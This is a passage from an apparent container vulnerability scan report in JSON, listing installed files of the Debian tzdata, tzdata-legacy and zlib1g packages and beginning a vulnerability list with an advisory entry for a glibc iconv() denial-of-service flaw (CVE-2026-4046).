"/usr/share/zoneinfo/Pacific/Palau", + "/usr/share/zoneinfo/Pacific/Pitcairn", + "/usr/share/zoneinfo/Pacific/Pohnpei", + "/usr/share/zoneinfo/Pacific/Port_Moresby", + "/usr/share/zoneinfo/Pacific/Rarotonga", + "/usr/share/zoneinfo/Pacific/Saipan", + "/usr/share/zoneinfo/Pacific/Tahiti", + "/usr/share/zoneinfo/Pacific/Tarawa", + "/usr/share/zoneinfo/Pacific/Tongatapu", + "/usr/share/zoneinfo/Pacific/Wake", + "/usr/share/zoneinfo/Pacific/Wallis", + "/usr/share/zoneinfo/iso3166.tab", + "/usr/share/zoneinfo/leap-seconds.list", + "/usr/share/zoneinfo/leapseconds", + "/usr/share/zoneinfo/tzdata.zi", + "/usr/share/zoneinfo/zone.tab", + "/usr/share/zoneinfo/zone1970.tab", + "/usr/share/zoneinfo/zonenow.tab" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "tzdata-legacy@2026a-0+deb13u1", + "Name": "tzdata-legacy", + "Identifier": { + "PURL": "pkg:deb/debian/tzdata-legacy@2026a-0%2Bdeb13u1?arch=all\u0026distro=debian-13.4", + "UID": "1fe1d77268447aa5" + }, + "Version": "2026a", + "Release": "0+deb13u1", + "Arch": "all", + "SrcName": "tzdata", + "SrcVersion": "2026a", + "SrcRelease": "0+deb13u1", + "Licenses": [ + "public-domain" + ], + "Maintainer": "GNU Libc Maintainers \u003cdebian-glibc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:b4242723c53fe4e094eb78569a2c15b6aafb8eb42aa9c3c2666130654a316ae2", + "DiffID": "sha256:f15316efa9979a44eee43172e640630f60407180eff3d985274befd600bb227d" + }, + "InstalledFiles": [ + "/usr/share/doc/tzdata-legacy/NEWS.Debian.gz", + "/usr/share/doc/tzdata-legacy/changelog.Debian.gz", + "/usr/share/doc/tzdata-legacy/changelog.gz", + "/usr/share/doc/tzdata-legacy/copyright", + "/usr/share/zoneinfo/right/Africa/Abidjan", + "/usr/share/zoneinfo/right/Africa/Accra", + "/usr/share/zoneinfo/right/Africa/Addis_Ababa", + "/usr/share/zoneinfo/right/Africa/Algiers", + "/usr/share/zoneinfo/right/Africa/Asmara", + "/usr/share/zoneinfo/right/Africa/Bamako", + "/usr/share/zoneinfo/right/Africa/Bangui", + "/usr/share/zoneinfo/right/Africa/Banjul", + "/usr/share/zoneinfo/right/Africa/Bissau", + "/usr/share/zoneinfo/right/Africa/Blantyre", + "/usr/share/zoneinfo/right/Africa/Brazzaville", + "/usr/share/zoneinfo/right/Africa/Bujumbura", + "/usr/share/zoneinfo/right/Africa/Cairo", + "/usr/share/zoneinfo/right/Africa/Casablanca", + "/usr/share/zoneinfo/right/Africa/Ceuta", + "/usr/share/zoneinfo/right/Africa/Conakry", + "/usr/share/zoneinfo/right/Africa/Dakar", + "/usr/share/zoneinfo/right/Africa/Dar_es_Salaam", + "/usr/share/zoneinfo/right/Africa/Djibouti", + "/usr/share/zoneinfo/right/Africa/Douala", + "/usr/share/zoneinfo/right/Africa/El_Aaiun", + "/usr/share/zoneinfo/right/Africa/Freetown", + "/usr/share/zoneinfo/right/Africa/Gaborone", + "/usr/share/zoneinfo/right/Africa/Harare", + "/usr/share/zoneinfo/right/Africa/Johannesburg", + "/usr/share/zoneinfo/right/Africa/Juba", + "/usr/share/zoneinfo/right/Africa/Kampala", + "/usr/share/zoneinfo/right/Africa/Khartoum", + "/usr/share/zoneinfo/right/Africa/Kigali", + "/usr/share/zoneinfo/right/Africa/Kinshasa", + "/usr/share/zoneinfo/right/Africa/Lagos", + "/usr/share/zoneinfo/right/Africa/Libreville", + "/usr/share/zoneinfo/right/Africa/Lome", + "/usr/share/zoneinfo/right/Africa/Luanda", + "/usr/share/zoneinfo/right/Africa/Lubumbashi", + "/usr/share/zoneinfo/right/Africa/Lusaka", + "/usr/share/zoneinfo/right/Africa/Malabo", + "/usr/share/zoneinfo/right/Africa/Maputo", + "/usr/share/zoneinfo/right/Africa/Maseru", + "/usr/share/zoneinfo/right/Africa/Mbabane", + "/usr/share/zoneinfo/right/Africa/Mogadishu", + "/usr/share/zoneinfo/right/Africa/Monrovia", + "/usr/share/zoneinfo/right/Africa/Nairobi", + "/usr/share/zoneinfo/right/Africa/Ndjamena", + "/usr/share/zoneinfo/right/Africa/Niamey", + "/usr/share/zoneinfo/right/Africa/Nouakchott", + "/usr/share/zoneinfo/right/Africa/Ouagadougou", + "/usr/share/zoneinfo/right/Africa/Porto-Novo", + "/usr/share/zoneinfo/right/Africa/Sao_Tome", + "/usr/share/zoneinfo/right/Africa/Tripoli", + "/usr/share/zoneinfo/right/Africa/Tunis", + "/usr/share/zoneinfo/right/Africa/Windhoek", + "/usr/share/zoneinfo/right/America/Adak", + "/usr/share/zoneinfo/right/America/Anchorage", + "/usr/share/zoneinfo/right/America/Anguilla", + "/usr/share/zoneinfo/right/America/Antigua", + "/usr/share/zoneinfo/right/America/Araguaina", + "/usr/share/zoneinfo/right/America/Argentina/Buenos_Aires", + "/usr/share/zoneinfo/right/America/Argentina/Catamarca", + "/usr/share/zoneinfo/right/America/Argentina/Cordoba", + "/usr/share/zoneinfo/right/America/Argentina/Jujuy", + "/usr/share/zoneinfo/right/America/Argentina/La_Rioja", + "/usr/share/zoneinfo/right/America/Argentina/Mendoza", + "/usr/share/zoneinfo/right/America/Argentina/Rio_Gallegos", + "/usr/share/zoneinfo/right/America/Argentina/Salta", + "/usr/share/zoneinfo/right/America/Argentina/San_Juan", + "/usr/share/zoneinfo/right/America/Argentina/San_Luis", + "/usr/share/zoneinfo/right/America/Argentina/Tucuman", + "/usr/share/zoneinfo/right/America/Argentina/Ushuaia", + "/usr/share/zoneinfo/right/America/Aruba", + "/usr/share/zoneinfo/right/America/Asuncion", + "/usr/share/zoneinfo/right/America/Atikokan", + "/usr/share/zoneinfo/right/America/Bahia", + "/usr/share/zoneinfo/right/America/Bahia_Banderas", + "/usr/share/zoneinfo/right/America/Barbados", + "/usr/share/zoneinfo/right/America/Belem", + "/usr/share/zoneinfo/right/America/Belize", + "/usr/share/zoneinfo/right/America/Blanc-Sablon", + "/usr/share/zoneinfo/right/America/Boa_Vista", + "/usr/share/zoneinfo/right/America/Bogota", + "/usr/share/zoneinfo/right/America/Boise", + "/usr/share/zoneinfo/right/America/Cambridge_Bay", + "/usr/share/zoneinfo/right/America/Campo_Grande", + "/usr/share/zoneinfo/right/America/Cancun", + "/usr/share/zoneinfo/right/America/Caracas", + "/usr/share/zoneinfo/right/America/Cayenne", + "/usr/share/zoneinfo/right/America/Cayman", + "/usr/share/zoneinfo/right/America/Chicago", + "/usr/share/zoneinfo/right/America/Chihuahua", + "/usr/share/zoneinfo/right/America/Ciudad_Juarez", + "/usr/share/zoneinfo/right/America/Costa_Rica", + "/usr/share/zoneinfo/right/America/Coyhaique", + "/usr/share/zoneinfo/right/America/Creston", + "/usr/share/zoneinfo/right/America/Cuiaba", + "/usr/share/zoneinfo/right/America/Curacao", + "/usr/share/zoneinfo/right/America/Danmarkshavn", + "/usr/share/zoneinfo/right/America/Dawson", + "/usr/share/zoneinfo/right/America/Dawson_Creek", + "/usr/share/zoneinfo/right/America/Denver", + "/usr/share/zoneinfo/right/America/Detroit", + "/usr/share/zoneinfo/right/America/Dominica", + "/usr/share/zoneinfo/right/America/Edmonton", + "/usr/share/zoneinfo/right/America/Eirunepe", + "/usr/share/zoneinfo/right/America/El_Salvador", + "/usr/share/zoneinfo/right/America/Fort_Nelson", + "/usr/share/zoneinfo/right/America/Fortaleza", + "/usr/share/zoneinfo/right/America/Glace_Bay", + "/usr/share/zoneinfo/right/America/Goose_Bay", + "/usr/share/zoneinfo/right/America/Grand_Turk", + "/usr/share/zoneinfo/right/America/Grenada", + "/usr/share/zoneinfo/right/America/Guadeloupe", + "/usr/share/zoneinfo/right/America/Guatemala", + "/usr/share/zoneinfo/right/America/Guayaquil", + "/usr/share/zoneinfo/right/America/Guyana", + "/usr/share/zoneinfo/right/America/Halifax", + "/usr/share/zoneinfo/right/America/Havana", + "/usr/share/zoneinfo/right/America/Hermosillo", + "/usr/share/zoneinfo/right/America/Indiana/Indianapolis", + "/usr/share/zoneinfo/right/America/Indiana/Knox", + "/usr/share/zoneinfo/right/America/Indiana/Marengo", + "/usr/share/zoneinfo/right/America/Indiana/Petersburg", + "/usr/share/zoneinfo/right/America/Indiana/Tell_City", + "/usr/share/zoneinfo/right/America/Indiana/Vevay", + "/usr/share/zoneinfo/right/America/Indiana/Vincennes", + "/usr/share/zoneinfo/right/America/Indiana/Winamac", + "/usr/share/zoneinfo/right/America/Inuvik", + "/usr/share/zoneinfo/right/America/Iqaluit", + "/usr/share/zoneinfo/right/America/Jamaica", + "/usr/share/zoneinfo/right/America/Juneau", + "/usr/share/zoneinfo/right/America/Kentucky/Louisville", + "/usr/share/zoneinfo/right/America/Kentucky/Monticello", + "/usr/share/zoneinfo/right/America/La_Paz", + "/usr/share/zoneinfo/right/America/Lima", + "/usr/share/zoneinfo/right/America/Los_Angeles", + "/usr/share/zoneinfo/right/America/Maceio", + "/usr/share/zoneinfo/right/America/Managua", + "/usr/share/zoneinfo/right/America/Manaus", + "/usr/share/zoneinfo/right/America/Martinique", + "/usr/share/zoneinfo/right/America/Matamoros", + "/usr/share/zoneinfo/right/America/Mazatlan", + "/usr/share/zoneinfo/right/America/Menominee", + "/usr/share/zoneinfo/right/America/Merida", + "/usr/share/zoneinfo/right/America/Metlakatla", + "/usr/share/zoneinfo/right/America/Mexico_City", + "/usr/share/zoneinfo/right/America/Miquelon", + "/usr/share/zoneinfo/right/America/Moncton", + "/usr/share/zoneinfo/right/America/Monterrey", + "/usr/share/zoneinfo/right/America/Montevideo", + "/usr/share/zoneinfo/right/America/Montserrat", + "/usr/share/zoneinfo/right/America/Nassau", + "/usr/share/zoneinfo/right/America/New_York", + "/usr/share/zoneinfo/right/America/Nome", + "/usr/share/zoneinfo/right/America/Noronha", + "/usr/share/zoneinfo/right/America/North_Dakota/Beulah", + "/usr/share/zoneinfo/right/America/North_Dakota/Center", + "/usr/share/zoneinfo/right/America/North_Dakota/New_Salem", + "/usr/share/zoneinfo/right/America/Nuuk", + "/usr/share/zoneinfo/right/America/Ojinaga", + "/usr/share/zoneinfo/right/America/Panama", + "/usr/share/zoneinfo/right/America/Paramaribo", + "/usr/share/zoneinfo/right/America/Phoenix", + "/usr/share/zoneinfo/right/America/Port-au-Prince", + "/usr/share/zoneinfo/right/America/Port_of_Spain", + "/usr/share/zoneinfo/right/America/Porto_Velho", + "/usr/share/zoneinfo/right/America/Puerto_Rico", + "/usr/share/zoneinfo/right/America/Punta_Arenas", + "/usr/share/zoneinfo/right/America/Rankin_Inlet", + "/usr/share/zoneinfo/right/America/Recife", + "/usr/share/zoneinfo/right/America/Regina", + "/usr/share/zoneinfo/right/America/Resolute", + "/usr/share/zoneinfo/right/America/Rio_Branco", + "/usr/share/zoneinfo/right/America/Santarem", + "/usr/share/zoneinfo/right/America/Santiago", + "/usr/share/zoneinfo/right/America/Santo_Domingo", + "/usr/share/zoneinfo/right/America/Sao_Paulo", + "/usr/share/zoneinfo/right/America/Scoresbysund", + "/usr/share/zoneinfo/right/America/Sitka", + "/usr/share/zoneinfo/right/America/St_Johns", + "/usr/share/zoneinfo/right/America/St_Kitts", + "/usr/share/zoneinfo/right/America/St_Lucia", + "/usr/share/zoneinfo/right/America/St_Thomas", + "/usr/share/zoneinfo/right/America/St_Vincent", + "/usr/share/zoneinfo/right/America/Swift_Current", + "/usr/share/zoneinfo/right/America/Tegucigalpa", + "/usr/share/zoneinfo/right/America/Thule", + "/usr/share/zoneinfo/right/America/Tijuana", + "/usr/share/zoneinfo/right/America/Toronto", + "/usr/share/zoneinfo/right/America/Tortola", + "/usr/share/zoneinfo/right/America/Vancouver", + "/usr/share/zoneinfo/right/America/Whitehorse", + "/usr/share/zoneinfo/right/America/Winnipeg", + "/usr/share/zoneinfo/right/America/Yakutat", + "/usr/share/zoneinfo/right/Antarctica/Casey", + "/usr/share/zoneinfo/right/Antarctica/Davis", + "/usr/share/zoneinfo/right/Antarctica/DumontDUrville", + "/usr/share/zoneinfo/right/Antarctica/Macquarie", + "/usr/share/zoneinfo/right/Antarctica/Mawson", + "/usr/share/zoneinfo/right/Antarctica/McMurdo", + "/usr/share/zoneinfo/right/Antarctica/Palmer", + "/usr/share/zoneinfo/right/Antarctica/Rothera", + "/usr/share/zoneinfo/right/Antarctica/Syowa", + "/usr/share/zoneinfo/right/Antarctica/Troll", + "/usr/share/zoneinfo/right/Antarctica/Vostok", + "/usr/share/zoneinfo/right/Asia/Aden", + "/usr/share/zoneinfo/right/Asia/Almaty", + "/usr/share/zoneinfo/right/Asia/Amman", + "/usr/share/zoneinfo/right/Asia/Anadyr", + "/usr/share/zoneinfo/right/Asia/Aqtau", + "/usr/share/zoneinfo/right/Asia/Aqtobe", + "/usr/share/zoneinfo/right/Asia/Ashgabat", + "/usr/share/zoneinfo/right/Asia/Atyrau", + "/usr/share/zoneinfo/right/Asia/Baghdad", + "/usr/share/zoneinfo/right/Asia/Bahrain", + "/usr/share/zoneinfo/right/Asia/Baku", + "/usr/share/zoneinfo/right/Asia/Bangkok", + "/usr/share/zoneinfo/right/Asia/Barnaul", + "/usr/share/zoneinfo/right/Asia/Beirut", + "/usr/share/zoneinfo/right/Asia/Bishkek", + "/usr/share/zoneinfo/right/Asia/Brunei", + "/usr/share/zoneinfo/right/Asia/Chita", + "/usr/share/zoneinfo/right/Asia/Colombo", + "/usr/share/zoneinfo/right/Asia/Damascus", + "/usr/share/zoneinfo/right/Asia/Dhaka", + "/usr/share/zoneinfo/right/Asia/Dili", + "/usr/share/zoneinfo/right/Asia/Dubai", + "/usr/share/zoneinfo/right/Asia/Dushanbe", + "/usr/share/zoneinfo/right/Asia/Famagusta", + "/usr/share/zoneinfo/right/Asia/Gaza", + "/usr/share/zoneinfo/right/Asia/Hebron", + "/usr/share/zoneinfo/right/Asia/Ho_Chi_Minh", + "/usr/share/zoneinfo/right/Asia/Hong_Kong", + "/usr/share/zoneinfo/right/Asia/Hovd", + "/usr/share/zoneinfo/right/Asia/Irkutsk", + "/usr/share/zoneinfo/right/Asia/Jakarta", + "/usr/share/zoneinfo/right/Asia/Jayapura", + "/usr/share/zoneinfo/right/Asia/Jerusalem", + "/usr/share/zoneinfo/right/Asia/Kabul", + "/usr/share/zoneinfo/right/Asia/Kamchatka", + "/usr/share/zoneinfo/right/Asia/Karachi", + "/usr/share/zoneinfo/right/Asia/Kathmandu", + "/usr/share/zoneinfo/right/Asia/Khandyga", + "/usr/share/zoneinfo/right/Asia/Kolkata", + "/usr/share/zoneinfo/right/Asia/Krasnoyarsk", + "/usr/share/zoneinfo/right/Asia/Kuala_Lumpur", + "/usr/share/zoneinfo/right/Asia/Kuching", + "/usr/share/zoneinfo/right/Asia/Kuwait", + "/usr/share/zoneinfo/right/Asia/Macau", + "/usr/share/zoneinfo/right/Asia/Magadan", + "/usr/share/zoneinfo/right/Asia/Makassar", + "/usr/share/zoneinfo/right/Asia/Manila", + "/usr/share/zoneinfo/right/Asia/Muscat", + "/usr/share/zoneinfo/right/Asia/Nicosia", + "/usr/share/zoneinfo/right/Asia/Novokuznetsk", + "/usr/share/zoneinfo/right/Asia/Novosibirsk", + "/usr/share/zoneinfo/right/Asia/Omsk", + "/usr/share/zoneinfo/right/Asia/Oral", + "/usr/share/zoneinfo/right/Asia/Phnom_Penh", + "/usr/share/zoneinfo/right/Asia/Pontianak", + "/usr/share/zoneinfo/right/Asia/Pyongyang", + "/usr/share/zoneinfo/right/Asia/Qatar", + "/usr/share/zoneinfo/right/Asia/Qostanay", + "/usr/share/zoneinfo/right/Asia/Qyzylorda", + "/usr/share/zoneinfo/right/Asia/Riyadh", + "/usr/share/zoneinfo/right/Asia/Sakhalin", + "/usr/share/zoneinfo/right/Asia/Samarkand", + "/usr/share/zoneinfo/right/Asia/Seoul", + "/usr/share/zoneinfo/right/Asia/Shanghai", + "/usr/share/zoneinfo/right/Asia/Singapore", + "/usr/share/zoneinfo/right/Asia/Srednekolymsk", + "/usr/share/zoneinfo/right/Asia/Taipei", + "/usr/share/zoneinfo/right/Asia/Tashkent", + "/usr/share/zoneinfo/right/Asia/Tbilisi", + "/usr/share/zoneinfo/right/Asia/Tehran", + "/usr/share/zoneinfo/right/Asia/Thimphu", + "/usr/share/zoneinfo/right/Asia/Tokyo", + "/usr/share/zoneinfo/right/Asia/Tomsk", + "/usr/share/zoneinfo/right/Asia/Ulaanbaatar", + "/usr/share/zoneinfo/right/Asia/Urumqi", + "/usr/share/zoneinfo/right/Asia/Ust-Nera", + "/usr/share/zoneinfo/right/Asia/Vientiane", + "/usr/share/zoneinfo/right/Asia/Vladivostok", + "/usr/share/zoneinfo/right/Asia/Yakutsk", + "/usr/share/zoneinfo/right/Asia/Yangon", + "/usr/share/zoneinfo/right/Asia/Yekaterinburg", + "/usr/share/zoneinfo/right/Asia/Yerevan", + "/usr/share/zoneinfo/right/Atlantic/Azores", + "/usr/share/zoneinfo/right/Atlantic/Bermuda", + "/usr/share/zoneinfo/right/Atlantic/Canary", + "/usr/share/zoneinfo/right/Atlantic/Cape_Verde", + "/usr/share/zoneinfo/right/Atlantic/Faroe", + "/usr/share/zoneinfo/right/Atlantic/Madeira", + "/usr/share/zoneinfo/right/Atlantic/Reykjavik", + "/usr/share/zoneinfo/right/Atlantic/South_Georgia", + "/usr/share/zoneinfo/right/Atlantic/St_Helena", + "/usr/share/zoneinfo/right/Atlantic/Stanley", + "/usr/share/zoneinfo/right/Australia/Adelaide", + "/usr/share/zoneinfo/right/Australia/Brisbane", + "/usr/share/zoneinfo/right/Australia/Broken_Hill", + "/usr/share/zoneinfo/right/Australia/Darwin", + "/usr/share/zoneinfo/right/Australia/Eucla", + "/usr/share/zoneinfo/right/Australia/Hobart", + "/usr/share/zoneinfo/right/Australia/Lindeman", + "/usr/share/zoneinfo/right/Australia/Lord_Howe", + "/usr/share/zoneinfo/right/Australia/Melbourne", + "/usr/share/zoneinfo/right/Australia/Perth", + "/usr/share/zoneinfo/right/Australia/Sydney", + "/usr/share/zoneinfo/right/Etc/GMT", + "/usr/share/zoneinfo/right/Etc/GMT+1", + "/usr/share/zoneinfo/right/Etc/GMT+10", + "/usr/share/zoneinfo/right/Etc/GMT+11", + "/usr/share/zoneinfo/right/Etc/GMT+12", + "/usr/share/zoneinfo/right/Etc/GMT+2", + "/usr/share/zoneinfo/right/Etc/GMT+3", + "/usr/share/zoneinfo/right/Etc/GMT+4", + "/usr/share/zoneinfo/right/Etc/GMT+5", + "/usr/share/zoneinfo/right/Etc/GMT+6", + "/usr/share/zoneinfo/right/Etc/GMT+7", + "/usr/share/zoneinfo/right/Etc/GMT+8", + "/usr/share/zoneinfo/right/Etc/GMT+9", + "/usr/share/zoneinfo/right/Etc/GMT-1", + "/usr/share/zoneinfo/right/Etc/GMT-10", + "/usr/share/zoneinfo/right/Etc/GMT-11", + "/usr/share/zoneinfo/right/Etc/GMT-12", + "/usr/share/zoneinfo/right/Etc/GMT-13", + "/usr/share/zoneinfo/right/Etc/GMT-14", + "/usr/share/zoneinfo/right/Etc/GMT-2", + "/usr/share/zoneinfo/right/Etc/GMT-3", + "/usr/share/zoneinfo/right/Etc/GMT-4", + "/usr/share/zoneinfo/right/Etc/GMT-5", + "/usr/share/zoneinfo/right/Etc/GMT-6", + "/usr/share/zoneinfo/right/Etc/GMT-7", + "/usr/share/zoneinfo/right/Etc/GMT-8", + "/usr/share/zoneinfo/right/Etc/GMT-9", + "/usr/share/zoneinfo/right/Etc/UTC", + "/usr/share/zoneinfo/right/Europe/Amsterdam", + "/usr/share/zoneinfo/right/Europe/Andorra", + "/usr/share/zoneinfo/right/Europe/Astrakhan", + "/usr/share/zoneinfo/right/Europe/Athens", + "/usr/share/zoneinfo/right/Europe/Belgrade", + "/usr/share/zoneinfo/right/Europe/Berlin", + "/usr/share/zoneinfo/right/Europe/Brussels", + "/usr/share/zoneinfo/right/Europe/Bucharest", + "/usr/share/zoneinfo/right/Europe/Budapest", + "/usr/share/zoneinfo/right/Europe/Chisinau", + "/usr/share/zoneinfo/right/Europe/Copenhagen", + "/usr/share/zoneinfo/right/Europe/Dublin", + "/usr/share/zoneinfo/right/Europe/Gibraltar", + "/usr/share/zoneinfo/right/Europe/Guernsey", + "/usr/share/zoneinfo/right/Europe/Helsinki", + "/usr/share/zoneinfo/right/Europe/Isle_of_Man", + "/usr/share/zoneinfo/right/Europe/Istanbul", + "/usr/share/zoneinfo/right/Europe/Jersey", + "/usr/share/zoneinfo/right/Europe/Kaliningrad", + "/usr/share/zoneinfo/right/Europe/Kirov", + "/usr/share/zoneinfo/right/Europe/Kyiv", + "/usr/share/zoneinfo/right/Europe/Lisbon", + "/usr/share/zoneinfo/right/Europe/Ljubljana", + "/usr/share/zoneinfo/right/Europe/London", + "/usr/share/zoneinfo/right/Europe/Luxembourg", + "/usr/share/zoneinfo/right/Europe/Madrid", + "/usr/share/zoneinfo/right/Europe/Malta", + "/usr/share/zoneinfo/right/Europe/Minsk", + "/usr/share/zoneinfo/right/Europe/Monaco", + "/usr/share/zoneinfo/right/Europe/Moscow", + "/usr/share/zoneinfo/right/Europe/Oslo", + "/usr/share/zoneinfo/right/Europe/Paris", + "/usr/share/zoneinfo/right/Europe/Prague", + "/usr/share/zoneinfo/right/Europe/Riga", + "/usr/share/zoneinfo/right/Europe/Rome", + "/usr/share/zoneinfo/right/Europe/Samara", + "/usr/share/zoneinfo/right/Europe/Sarajevo", + "/usr/share/zoneinfo/right/Europe/Saratov", + "/usr/share/zoneinfo/right/Europe/Simferopol", + "/usr/share/zoneinfo/right/Europe/Skopje", + "/usr/share/zoneinfo/right/Europe/Sofia", + "/usr/share/zoneinfo/right/Europe/Stockholm", + "/usr/share/zoneinfo/right/Europe/Tallinn", + "/usr/share/zoneinfo/right/Europe/Tirane", + "/usr/share/zoneinfo/right/Europe/Ulyanovsk", + "/usr/share/zoneinfo/right/Europe/Vaduz", + "/usr/share/zoneinfo/right/Europe/Vienna", + "/usr/share/zoneinfo/right/Europe/Vilnius", + "/usr/share/zoneinfo/right/Europe/Volgograd", + "/usr/share/zoneinfo/right/Europe/Warsaw", + "/usr/share/zoneinfo/right/Europe/Zagreb", + "/usr/share/zoneinfo/right/Europe/Zurich", + "/usr/share/zoneinfo/right/Factory", + "/usr/share/zoneinfo/right/Indian/Antananarivo", + "/usr/share/zoneinfo/right/Indian/Chagos", + "/usr/share/zoneinfo/right/Indian/Christmas", + "/usr/share/zoneinfo/right/Indian/Cocos", + "/usr/share/zoneinfo/right/Indian/Comoro", + "/usr/share/zoneinfo/right/Indian/Kerguelen", + "/usr/share/zoneinfo/right/Indian/Mahe", + "/usr/share/zoneinfo/right/Indian/Maldives", + "/usr/share/zoneinfo/right/Indian/Mauritius", + "/usr/share/zoneinfo/right/Indian/Mayotte", + "/usr/share/zoneinfo/right/Indian/Reunion", + "/usr/share/zoneinfo/right/Pacific/Apia", + "/usr/share/zoneinfo/right/Pacific/Auckland", + "/usr/share/zoneinfo/right/Pacific/Bougainville", + "/usr/share/zoneinfo/right/Pacific/Chatham", + "/usr/share/zoneinfo/right/Pacific/Chuuk", + "/usr/share/zoneinfo/right/Pacific/Easter", + "/usr/share/zoneinfo/right/Pacific/Efate", + "/usr/share/zoneinfo/right/Pacific/Fakaofo", + "/usr/share/zoneinfo/right/Pacific/Fiji", + "/usr/share/zoneinfo/right/Pacific/Funafuti", + "/usr/share/zoneinfo/right/Pacific/Galapagos", + "/usr/share/zoneinfo/right/Pacific/Gambier", + "/usr/share/zoneinfo/right/Pacific/Guadalcanal", + "/usr/share/zoneinfo/right/Pacific/Guam", + "/usr/share/zoneinfo/right/Pacific/Honolulu", + "/usr/share/zoneinfo/right/Pacific/Kanton", + "/usr/share/zoneinfo/right/Pacific/Kiritimati", + "/usr/share/zoneinfo/right/Pacific/Kosrae", + "/usr/share/zoneinfo/right/Pacific/Kwajalein", + "/usr/share/zoneinfo/right/Pacific/Majuro", + "/usr/share/zoneinfo/right/Pacific/Marquesas", + "/usr/share/zoneinfo/right/Pacific/Midway", + "/usr/share/zoneinfo/right/Pacific/Nauru", + "/usr/share/zoneinfo/right/Pacific/Niue", + "/usr/share/zoneinfo/right/Pacific/Norfolk", + "/usr/share/zoneinfo/right/Pacific/Noumea", + "/usr/share/zoneinfo/right/Pacific/Pago_Pago", + "/usr/share/zoneinfo/right/Pacific/Palau", + "/usr/share/zoneinfo/right/Pacific/Pitcairn", + "/usr/share/zoneinfo/right/Pacific/Pohnpei", + "/usr/share/zoneinfo/right/Pacific/Port_Moresby", + "/usr/share/zoneinfo/right/Pacific/Rarotonga", + "/usr/share/zoneinfo/right/Pacific/Saipan", + "/usr/share/zoneinfo/right/Pacific/Tahiti", + "/usr/share/zoneinfo/right/Pacific/Tarawa", + "/usr/share/zoneinfo/right/Pacific/Tongatapu", + "/usr/share/zoneinfo/right/Pacific/Wake", + "/usr/share/zoneinfo/right/Pacific/Wallis" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "zlib1g@1:1.3.dfsg+really1.3.1-1+b1", + "Name": "zlib1g", + "Identifier": { + "PURL": "pkg:deb/debian/zlib1g@1.3.dfsg%2Breally1.3.1-1%2Bb1?arch=amd64\u0026distro=debian-13.4\u0026epoch=1", + "UID": "ee958543a42dbedd" + }, + "Version": "1.3.dfsg+really1.3.1", + "Release": "1+b1", + "Epoch": 1, + "Arch": "amd64", + "SrcName": "zlib", + "SrcVersion": "1.3.dfsg+really1.3.1", + "SrcRelease": "1", + "SrcEpoch": 1, + "Licenses": [ + "Zlib" + ], + "Maintainer": "Mark Brown \u003cbroonie@debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:cac2ae0193cb073e7492050b05fc342a888651b4bbc966908c8793f889c299ba", + "DiffID": "sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/libz.so.1.3.1", + "/usr/share/doc/zlib1g/changelog.Debian.amd64.gz", + "/usr/share/doc/zlib1g/changelog.Debian.gz", + "/usr/share/doc/zlib1g/changelog.gz", + "/usr/share/doc/zlib1g/copyright" + ], + "AnalyzedBy": "dpkg" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2026-4046", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "FixedVersion": "2.41-12+deb13u3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4046", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:1116092fec7fb1469bf3bd07878195dce4a13237ac3857846a5c60df26b6d40b", + "Title": "glibc: glibc: Denial of Service via iconv() function with specific character sets", + "Description": "The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.\n\n\n\nThis vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-617" + ], + "VendorSeverity": { + "alma": 2, + "amazon": 3, + "azure": 3, + "oracle-oval": 2, + "photon": 3, + "redhat": 2, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:20587", + "https://access.redhat.com/security/cve/CVE-2026-4046", + "https://bugzilla.redhat.com/2453117", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449777", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449783", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453117", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438", + "https://errata.almalinux.org/8/ALSA-2026-20587.html", + "https://errata.rockylinux.org/RLSA-2026:20597", + "https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u", + "https://linux.oracle.com/cve/CVE-2026-4046.html", + "https://linux.oracle.com/errata/ELSA-2026-50291.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-4046", + "https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=33980", + "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007", + "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD", + "https://www.cve.org/CVERecord?id=CVE-2026-4046" + ], + "PublishedDate": "2026-03-30T18:16:19.573Z", + "LastModifiedDate": "2026-04-20T22:16:23.623Z" + }, + { + "VulnerabilityID": "CVE-2026-4437", + "PkgID": 